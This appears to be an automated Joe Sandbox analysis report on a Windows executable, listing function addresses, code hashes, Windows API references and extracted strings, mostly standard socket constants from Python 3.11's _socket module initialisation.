Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\file.exe
API String ID: 3580290477-1957095476
Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
Instruction ID: 5bae80b123212536b551d111b4e4cac4631b50baeae0a1394f1341ae5d065547
Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
Instruction Fuzzy Hash: 5C419F32E08B52D5E714DF26A8800BC63DAEF45794B595035EA4E87BCBDE3DE481AF00

Function 00007FF6399CF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CF916

Part of subcall function 00007FF6399CE8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF6399CE908

Strings

., xrefs: 00007FF6399CF967
:, xrefs: 00007FF6399CF956

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
Instruction ID: bf4df4939de93dd06d8182bfc04cc0b878e9c252535723f49fa895a2b8b456d2
Opcode Fuzzy Hash: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
Instruction Fuzzy Hash: B5412A22F08A5298FB119FA19C511BC27B6AF14758F580039DE4DA7BCEEF389446AF10

Function 00007FF6399CBF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6399CC05F
GetLastError.KERNEL32 ref: 00007FF6399CC081

Strings

U, xrefs: 00007FF6399CC00B

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction ID: 110170fbe8a2db689817185d1bdf7057fc3ee052df3ceb1c1dbebc7ab13ebe1f
Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction Fuzzy Hash: 16418322A19A4686DB20DF25E8443A97761FB98B94F484031EA4DC779DEF3CD441DF40

Function 00007FF6399CE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6399CE908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6399CE95A

Strings

:, xrefs: 00007FF6399CE91E

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
Instruction ID: 24cf6ba67ea5c256184b69b44759779ed0ed284c860266d794b2077cc1ed7231
Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
Instruction Fuzzy Hash: 10219E22E0868686EB609F15D84427D63A6FB84B84F494035DA8E837CADF7CE9459F41

Function 00007FF6399BF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6399BF0B8
RaiseException.KERNEL32 ref: 00007FF6399BF0F9

Strings

csm, xrefs: 00007FF6399BF0E6

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: a4a5144de1e8a38b8d93ed3175d110e9f001fb0ec8f18225f607f9422e44146f
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: ED112B36618B8582EB218F15F440269B7E5FB88B84F584235DF8D47BA9DF3CD5518B00

Function 00007FF6399CFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CFA7C
GetDriveTypeW.KERNEL32 ref: 00007FF6399CFABC

Strings

:, xrefs: 00007FF6399CFAA5

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction ID: 193f0fdcf3bfef65c6f0689e63a15f0c426b2e80a2f928c7c613a8be696dfaa6
Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction Fuzzy Hash: 21014F22E1C24786FB20AF60986127E63A1EF58708F881035D54DC67DFEE7CE544EE14

Analysis Process: file.exePID: 6952, Parent PID: 6892COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	816
Total number of Limit Nodes:	28

Executed Functions

Function 00007FFE14631060 Relevance: 632.7, APIs: 189, Strings: 172, Instructions: 923
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 00007FFE146310A2
Py_AtExit.PYTHON311 ref: 00007FFE146310B7
VerSetConditionMask.KERNEL32 ref: 00007FFE14631102
VerSetConditionMask.KERNEL32 ref: 00007FFE14631111
VerSetConditionMask.KERNEL32 ref: 00007FFE14631121
VerifyVersionInfoW.KERNEL32 ref: 00007FFE14631145
PyModule_Create2.PYTHON311 ref: 00007FFE14631173
PyModule_AddObject.PYTHON311 ref: 00007FFE1463119F
PyErr_NewException.PYTHON311 ref: 00007FFE146311B9
PyModule_AddObject.PYTHON311 ref: 00007FFE146311DF
PyErr_NewException.PYTHON311 ref: 00007FFE146311F9
PyModule_AddObject.PYTHON311 ref: 00007FFE1463121F
PyModule_AddObjectRef.PYTHON311 ref: 00007FFE14631239
PyModule_AddObject.PYTHON311 ref: 00007FFE1463125A
PyModule_AddObject.PYTHON311 ref: 00007FFE1463127C
PyModule_AddObject.PYTHON311 ref: 00007FFE1463129E
PyMem_Malloc.PYTHON311 ref: 00007FFE146312A9
PyCapsule_New.PYTHON311 ref: 00007FFE146312F8
PyModule_AddObject.PYTHON311 ref: 00007FFE14631317
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631332
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631348
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463135E
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631374
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463138A
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146313A0
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146313B6
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146313CC
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146313E2
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146313F8
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463140E
PyModule_AddStringConstant.PYTHON311 ref: 00007FFE14631425
PyModule_AddStringConstant.PYTHON311 ref: 00007FFE1463143C
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463144F
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631465
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463147B
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631491
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146314A7
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146314BA
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146314D0
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146314E6
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146314FC
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631512
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631528
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463153E
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631554
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463156A
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631580
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631596
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146315AC
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146315C2
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146315D8
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146315EE
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631604
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463161A
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631630
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631646
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631659
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463166F
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631685
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463169B
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146316B1
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146316C7
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146316DD
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146316F3
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631709
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463171F
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631735
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463174B
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631761
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631774
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631787
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463179A
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146317B0
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146317C6
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146317DC
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146317F2
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631808
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463181E
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631834
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463184A
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631860
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631876
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463188C
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146318A2
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146318B8
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146318CE
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146318E4
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146318FA
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631910
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631926
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463193C
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631952
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631968
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463197E
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631994
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146319AA
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146319C0
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146319D6
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146319EC
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631A02
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631A18
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631A2E
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631A44
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631A57
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631A6D
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631A83
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631A99
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631AAF
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631AC5
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631ADB
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631AEE
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631B04
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631B1A
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631B30
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631B46
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631B5C
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631B72
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631B88
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631B9E
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631BB4
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631BCA
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631BE0
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631BF6
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631C0C
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631C22
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631C38
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631C4E
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631C64
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631C7A
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631C90
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631CA6
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631CB9
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631CCF
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631CE5
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631CFB
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631D11
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631D27
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631D3A
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631D50
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631D66
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631D7C
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631D92
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631DA8
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631DBE
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631DD4
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631DEA
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631E00
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631E16
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631E2C
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631E42
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631E58
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631E6E
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631E81
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631E97
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631EAD
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631EC3
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631ED9
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631EEF
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631F05
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631F1B
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631F31
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631F44
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631F5A
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631F70
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631F86
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631F9C
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631FAF
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631FC2
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14631FD8
PyLong_FromUnsignedLong.PYTHON311 ref: 00007FFE14632039
PyModule_AddObject.PYTHON311 ref: 00007FFE14632051
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14632073
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE14632086
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE1463209C
PyModule_AddIntConstant.PYTHON311 ref: 00007FFE146320B2
PyModule_GetDict.PYTHON311 ref: 00007FFE146320BB
VerSetConditionMask.KERNEL32 ref: 00007FFE14632117
VerSetConditionMask.KERNEL32 ref: 00007FFE14632126
VerSetConditionMask.KERNEL32 ref: 00007FFE14632137
VerifyVersionInfoA.KERNEL32 ref: 00007FFE1463215D
PyErr_Format.PYTHON311 ref: 00007FFE14633130

Strings

SO_EXCLUSIVEADDRUSE, xrefs: 00007FFE146314F2
MSG_WAITALL, xrefs: 00007FFE146316BD
INADDR_MAX_LOCAL_GROUP, xrefs: 00007FFE14631ABB
IPPROTO_AH, xrefs: 00007FFE146318C4
WSAStartup failed: requested version not supported, xrefs: 00007FFE14633145
MSG_PEEK, xrefs: 00007FFE14631665
gaierror, xrefs: 00007FFE14631212
IPPROTO_GGP, xrefs: 00007FFE146317BC
MSG_TRUNC, xrefs: 00007FFE14631691
INADDR_UNSPEC_GROUP, xrefs: 00007FFE14631A8F
IPPROTO_SCTP, xrefs: 00007FFE14631932, 00007FFE14631A0E
SIO_LOOPBACK_FAST_PATH, xrefs: 00007FFE1463201C
AI_V4MAPPED, xrefs: 00007FFE14631EFB
IPV6_RECVTCLASS, xrefs: 00007FFE14631CF1
EAI_AGAIN, xrefs: 00007FFE14631DB4
SOMAXCONN, xrefs: 00007FFE1463163C
IP_MULTICAST_IF, xrefs: 00007FFE14631B68
socket.herror, xrefs: 00007FFE146311AC
IPPROTO_ICMPV6, xrefs: 00007FFE146318DA
AF_INET, xrefs: 00007FFE1463133E
NI_DGRAM, xrefs: 00007FFE14631F92
IPPROTO_ROUTING, xrefs: 00007FFE14631882
_socket.CAPI, xrefs: 00007FFE146312CC
IPPROTO_DSTOPTS, xrefs: 00007FFE14631906
NI_NUMERICHOST, xrefs: 00007FFE14631F50
SOL_SOCKET, xrefs: 00007FFE14631715
SO_SNDBUF, xrefs: 00007FFE1463158C
IPPROTO_ICLFXBM, xrefs: 00007FFE14631974
IPV6_RTHDR, xrefs: 00007FFE14631D07
IP_RECVDSTADDR, xrefs: 00007FFE14631B52
IPPROTO_PUP, xrefs: 00007FFE1463182A
SOCK_DGRAM, xrefs: 00007FFE1463145B
SOCK_SEQPACKET, xrefs: 00007FFE14631487
IPPROTO_ESP, xrefs: 00007FFE146318AE
RCVALL_MAX, xrefs: 00007FFE146320A8
IPPROTO_L2TP, xrefs: 00007FFE146319F8
SO_LINGER, xrefs: 00007FFE14631560
IPV6_JOIN_GROUP, xrefs: 00007FFE14631BD6
IPV6_PKTINFO, xrefs: 00007FFE14631CC5
IPV6_TCLASS, xrefs: 00007FFE14631D1D
TCP_NODELAY, xrefs: 00007FFE14631D30
AF_IPX, xrefs: 00007FFE14631354
AF_IRDA, xrefs: 00007FFE146313D8
EAI_MEMORY, xrefs: 00007FFE14631E0C
INADDR_ALLHOSTS_GROUP, xrefs: 00007FFE14631AA5
IPPROTO_MAX, xrefs: 00007FFE1463195E
MSG_CTRUNC, xrefs: 00007FFE146316A7
AI_NUMERICSERV, xrefs: 00007FFE14631EB9
IPPORT_RESERVED, xrefs: 00007FFE14631A24
IP_MULTICAST_TTL, xrefs: 00007FFE14631B7E
TCP_KEEPINTVL, xrefs: 00007FFE14631D72
00:00:00:FF:FF:FF, xrefs: 00007FFE1463142B
IPPROTO_CBT, xrefs: 00007FFE146319A0
herror, xrefs: 00007FFE146311D2
INADDR_NONE, xrefs: 00007FFE14631AD1
MSG_MCAST, xrefs: 00007FFE146316FF
EAI_SOCKTYPE, xrefs: 00007FFE14631E64
SO_RCVLOWAT, xrefs: 00007FFE146315CE
IPPROTO_PGM, xrefs: 00007FFE146319E2
BDADDR_ANY, xrefs: 00007FFE1463141E
CAPI, xrefs: 00007FFE1463130D
IPV6_HOPLIMIT, xrefs: 00007FFE14631C9C
IPPROTO_HOPOPTS, xrefs: 00007FFE1463177D
NI_MAXSERV, xrefs: 00007FFE14631F27
AF_LINK, xrefs: 00007FFE146313AC
SOL_IP, xrefs: 00007FFE1463172B
IPV6_CHECKSUM, xrefs: 00007FFE14631C70
has_ipv6, xrefs: 00007FFE14631291
SO_RCVTIMEO, xrefs: 00007FFE146315FA
IPPROTO_IDP, xrefs: 00007FFE14631856
SocketType, xrefs: 00007FFE14631250
IP_HDRINCL, xrefs: 00007FFE14631AFA
IPPROTO_IGP, xrefs: 00007FFE146319B6
IPV6_LEAVE_GROUP, xrefs: 00007FFE14631BEC
SHUT_RDWR, xrefs: 00007FFE14631FCE
IPPROTO_NONE, xrefs: 00007FFE146318F0
NI_MAXHOST, xrefs: 00007FFE14631F11
SO_USELOOPBACK, xrefs: 00007FFE1463154A
RCVALL_OFF, xrefs: 00007FFE14632069
IPPROTO_EGP, xrefs: 00007FFE14631814
SOCK_RAW, xrefs: 00007FFE14631471
MSG_ERRQUEUE, xrefs: 00007FFE146316D3
SO_DONTROUTE, xrefs: 00007FFE1463151E
SO_SNDTIMEO, xrefs: 00007FFE146315E4
SO_KEEPALIVE, xrefs: 00007FFE14631508
IPV6_MULTICAST_HOPS, xrefs: 00007FFE14631C02
SHUT_WR, xrefs: 00007FFE14631FB8
IP_TOS, xrefs: 00007FFE14631B10
IPV6_HOPOPTS, xrefs: 00007FFE14631CAF
EAI_BADFLAGS, xrefs: 00007FFE14631DCA
IP_RECVTOS, xrefs: 00007FFE14631B3C
socket.gaierror, xrefs: 00007FFE146311EC
SIO_KEEPALIVE_VALS, xrefs: 00007FFE14631FFD
SO_ERROR, xrefs: 00007FFE14631610
IPPROTO_FRAGMENT, xrefs: 00007FFE14631898
IPV6_MULTICAST_IF, xrefs: 00007FFE14631C18
IPPROTO_PIM, xrefs: 00007FFE1463191C
IPV6_MULTICAST_LOOP, xrefs: 00007FFE14631C2E
SO_SNDLOWAT, xrefs: 00007FFE146315B8
TCP_MAXSEG, xrefs: 00007FFE14631D46
AF_DECnet, xrefs: 00007FFE14631396
IPV6_DONTFRAG, xrefs: 00007FFE14631C86
MSG_DONTROUTE, xrefs: 00007FFE1463167B
INADDR_BROADCAST, xrefs: 00007FFE14631A63
INADDR_LOOPBACK, xrefs: 00007FFE14631A79
IPV6_RECVRTHDR, xrefs: 00007FFE14631CDB
EAI_NODATA, xrefs: 00007FFE14631E22
EAI_SERVICE, xrefs: 00007FFE14631E4E
SO_BROADCAST, xrefs: 00007FFE14631534
AF_SNA, xrefs: 00007FFE146313C2
AI_ADDRCONFIG, xrefs: 00007FFE14631EE5
SO_DEBUG, xrefs: 00007FFE146314B0
IPV6_V6ONLY, xrefs: 00007FFE14631C5A
NI_NOFQDN, xrefs: 00007FFE14631F3A
IP_TTL, xrefs: 00007FFE14631B26
IPPROTO_UDP, xrefs: 00007FFE14631840
IPPORT_USERRESERVED, xrefs: 00007FFE14631A3A
WSAStartup failed: network not ready, xrefs: 00007FFE1463313C
SO_OOBINLINE, xrefs: 00007FFE14631576
IP_MULTICAST_LOOP, xrefs: 00007FFE14631B94
IPV6_UNICAST_HOPS, xrefs: 00007FFE14631C44
SIO_RCVALL, xrefs: 00007FFE14631FDE
SO_REUSEADDR, xrefs: 00007FFE146314DC
SO_ACCEPTCONN, xrefs: 00007FFE146314C6
AI_CANONNAME, xrefs: 00007FFE14631E8D
SO_TYPE, xrefs: 00007FFE14631626
INADDR_ANY, xrefs: 00007FFE14631A4D
IPPROTO_ST, xrefs: 00007FFE1463198A
IPPROTO_IP, xrefs: 00007FFE1463176A
RCVALL_SOCKETLEVELONLY, xrefs: 00007FFE14632092
TCP_KEEPCNT, xrefs: 00007FFE14631D88
